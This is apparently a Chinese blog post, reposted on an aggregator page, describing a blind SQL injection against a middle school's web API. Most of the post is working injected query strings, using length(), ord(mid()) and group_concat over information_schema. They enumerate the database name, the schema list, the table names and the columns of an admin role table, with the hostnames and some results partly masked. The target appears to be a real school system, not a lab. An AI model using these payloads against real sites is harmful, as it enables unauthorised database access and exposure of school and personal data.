当前位置: 首页 > news >正文

某中学sql注入漏洞

news 2026/6/5 21:14:29

漏洞复现

image
sql盲注
判断正确会回复正常消息
数据库长度为6
https://xxx.xxx.com/xxxApi/getJsxxxxxxp?school_id=3 and length(database())=6&news_url=1
image
school_id=3 and ord(mid(database(),1,1))=115&news_url=1
第一个字母是s
image
进行爆破
数据库名为school
?school_id=3 and database()='school'&news_url=1
image

https://xxxxxxxxxxxx?school_id=3 and length((select group_concat(schema_name)from information_schema.schemata))=118&news_url=1
所有数据库长度118

https://xxxxxxxxxxxxxxxxxxxx?school_id=3 and ord(mid((select group_concat(schema_name)from information_schema.schemata),1,1))=105&news_url=1

information_schema,civixxxx,clotxxxs,impoxxxt,lxxx,mysql,performance_schema,schooxxl,sys,xxxxxl_job,yuxxxxnzx_clxxxxddb,yxxx

数据表名长度1024

https://xxxxxxxxxxxxxxxxxxxx?school_id=3 and length((select group_concat(table_name) from information_schema.tables where table_schema='school'))=1024&news_url=1

t_adxxxn_role,t_adxxxn_role_tree,t_axxxx_tree,txxxxi

https://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?school_id=3 and length((select group_concat(column_name) from information_schema.columns where table_schema='school'and table_name='t_admin_role'))=53&news_url=1

https://xxxxxxxxxxxxxxxxxxxxxxxxxxxxx?school_id=3 and ord(mid((select group_concat(column_name) from information_schema.columns where table_schema='school'and table_name='t_admin_role'),1,1))=105&news_url=1

id,rolxxxme,code,stxxxxs,cxxxxdate,rxxxrk,cxxxxte_id

http://www.rkmt.cn/news/1469081.html

相关文章:

  • 2026年东莞办公设备租赁配套服务商盘点:复印机/打印机/电脑租赁、整机组装与监控安装企业参考 - 海棠依旧大
  • 如何高效配置OpenCore引导器:PC运行macOS的完整方案指南
  • PoE网络变压器中共模扼流圈(CMC)的放置与磁饱和问题解析
  • VidDown:一个免费、本地优先的在线工具站(重点:视频解析下载)
  • Python信用评分卡终极指南:从零开始构建专业风险模型
  • Qt 6.0安装后第一件事:用Qt Creator创建你的第一个Hello World程序(Windows平台)
  • 如何用LibreSignage快速构建企业级数字标牌系统
  • 【每日一题】LeetCode 70. 爬楼梯 TypeScript
  • 光子晶体腔设计优化与水环境应用挑战
  • 2026年园艺工具品牌选购参考:绿植营养土、通用营养土、家用营养土、养花营养土、进口营养土、CPAI园艺产品综合梳理 - 海棠依旧大
  • 3分钟搞定Axure RP中文界面:新手也能快速上手的完整汉化教程
  • 2026年6月市面上评价高的消失模铸造件源头厂家推荐,保丽龙泡沫板/泡沫箱/消失模铸造件,消失模铸造件品牌找哪家 - 品牌推荐师
  • VMware虚机如何使用U盘
  • ThreadLocal 内存泄露?别慌,这锅双亲委派背得有点冤!附自愈方案
  • 2026 国内加速版 OpenClaw 安装,解决下载缓慢问题
  • Matlab实现偏置曲柄滑块机构运动学仿真:位移/速度/加速度曲线与误差分析
  • JTAG TAP状态机HDL实现与可观测调试实战
  • 抖音批量下载工具技术解析:从API破解到智能策略切换的架构设计
  • 2026年 缠绕模具厂家/折弯模具/方形模具/玻璃钢缠绕模具/电力设施模具最新推荐榜单:定制工艺与耐用口碑深度解析 - 品牌企业推荐师(官方)
  • 拥抱 Vibe Coding:重构一个现代化智能语音助手 (ClearVoice-ASR)
  • 终极Typora插件大全:62个免费功能增强工具完全指南
  • 企业级 RAG 权限隔离网关实战:从原理到落地
  • 2026年 广东平模厂家推荐排行榜:激光平模/吸塑平模/印刷平模/包装平模/EVA平模/文具平模/皮革平模/鼠标垫平模/内衣服饰平模/精密平模实力甄选 - 品牌企业推荐师(官方)
  • 别再傻傻分不清了!嵌入式开发中UART、I2C、SPI到底怎么选?附ESP32/STM32实战对比
  • 2026年 射频导纳/音叉/阻旋料位开关/压力/流量开关厂家推荐:热式流量开关与料位开关品牌技术解析 - 品牌企业推荐师(官方)
  • 静压式液位计十大品牌排行榜 - 水质仪表品牌排行榜
  • PowerToys-CN实战指南:解锁Windows效率神器的高级玩法
  • 老厂长随笔:搞定研发资料流失,工厂省下百万试错成本
  • 仅限首批200家企业的Gemini合规性速查矩阵(含NIST AI RMF映射表+自动打分引擎)
  • 北京市学员咨询众智商学院六西格玛课程怎么联系?官方入口说明 - 众智商学院职业教育